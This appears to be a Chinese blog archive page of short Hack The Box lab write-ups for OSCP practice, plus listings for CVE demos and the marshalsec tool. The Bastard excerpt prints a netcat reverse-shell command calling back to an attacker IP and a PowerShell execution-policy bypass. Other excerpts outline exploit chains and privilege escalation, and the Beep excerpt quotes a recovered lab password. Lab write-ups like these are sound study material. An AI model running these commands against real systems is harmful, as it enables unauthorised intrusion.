2020年05月_王嘟嘟_

08月 07月 06月 05月 04月 03月 02月 01月

原创 oscp——HTB——Optimum

0x00 前言难度入门1级0x01 信息收集0x02 Web——Webshell访问一下目标站点，看到是HFS搜一下payload发现可以直接使用msf打过去拿到shell之后就可以拿到user的flag这里我用cs又建立了一个稳定的连接0x03 Webshell——Rootshell首先systeminfo获取一下信息，然后使用Windows-Exploit-Suggester进行扫描使用MS16-098进行提权...

2020-05-25 17:26:38 540

原创 oscp——HTB——Bastard

0x00 前言难度入门1级0x01 信息收集0x02 Web——Webshell这里访问之后看到是一个Drupal的站，Drupal的站在7.0可以直接直接getshell使用脚本直接getshell0x03 Webshell——Rootshell传一个nc 上去然后反弹一个shellnc.exe -e cmd 10.10.14.6 1234这里可以使用Sherlock先进行扫描。powershell.exe -exec bypass -Command "& {Imp

2020-05-20 20:40:32 554

原创 oscp——HTB——Devel

0x00 前言难度入门1级0x01 信息收集这里可以看到开了21和80扫一下21，由于我这里有一点问题，所以21得重新扫一下0x02 21——Webshell本来以为是通过80扫目录然后搞进去。。。但是最后扫了半天发现扫错了。发现是通过21搞进去的。可以看到是匿名访问。所以直接使用ftp连接。这里可以看到ftp的目录可能是和web目录一致的访问test.txt进行测试这里使用msf生成一个aspx的马，然后直接put上传msf监听，访问cs.aspx会弹回来一个shell

2020-05-19 15:55:00 372

原创 oscp——HTB——Beep

0x00 前言难度入门1级0x01 信息收集0x02 Web——Rootshell先看一下80端口，是一个登录界面，尝试了弱口令以及SQL注入搜索一下Elastix的历史漏洞首先看到了一个LFI的洞，下载下来，然后看一下利用payload进行测试这里找到了一个admin的密码jEhdIekWmdjE可以尝试登录一下ssh，原本先尝试的admin，但是失败了，又尝试了下root，就可以成功的连接上了。...

2020-05-09 15:24:58 499

原创 oscp——HTB——Popcorn

0x00 前言难度入门2级0x01 信息收集这里开放了22和800x02 Web——Webshell看到这里是一个test，果断扫目录。拿到目录：http://10.10.10.6/testhttp://10.10.10.6/torrent/先看一下test，phpinfo的界面访问http://10.10.10.6/torrent/ 可以看到是一个torrent的站，先注册一个账号然后上传一个torrent然后这里上传成功这里上传文件，并使用burp拦截，并且修改

2020-05-09 14:32:12 540

SDL安全建设流程落地方法方案

SDL安全建设流程落地方法方案。 SDL：Security Development Lifecycle 安全开发生命周期，将安全融入到开发的每一个过程中去，以减少软件中漏洞的数量并将安全缺陷降低到最小程度。资源里包括了所有SDL流程中应该做的时候，可以通过此文档学习到如果建设SDL流程以及一个比较简单的SDL流程的落地。在建设安全SDL中有非常重要的辅助意义。如解决如下问题： - 项目的哪些部分在发布前需要威胁模型？ - 项目的哪些部分在发布前需要进行安全设计评析？ - 项目的哪些部分（如果有）需要由不属于项目团队且双方认可的小组进行渗透测试？ - 是否存在安全顾问认为有必要增加的测试或分析要求以缓解安全风险？

2023-03-05

CVE-2016-3720

XML external entity (XXE) vulnerability in XmlMapper in the Data format extension for Jackson (aka jackson-dataformat-xml) allows attackers to have unspecified impact via unknown vectors. 这个项目是CVE-2016-3720 Demo，为了避免搭建环境，大佬们可以直接获取到这个资源。相对应的分析文章是：https://blog.csdn.net/qq_36869808 可以在这篇文章看到分析的内容，感谢~当然如果非常需要这个资源，也可以私聊我

2023-02-22

CVE-2022-22963 复现Demo

CVE-2022-22963 复现Demo，A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it. 存在任何使用问题可以私信本人。

2022-04-14

marshalsec.jar.7z

marshalsec-0.0.3-SNAPSHOT-all-fastjson，主要用来开ldap和rmi marshalsec-0.0.3-SNAPSHOT-all-fastjson，主要用来开ldap和rmi marshalsec-0.0.3-SNAPSHOT-all-fastjson，主要用来开ldap和rmi

2021-12-03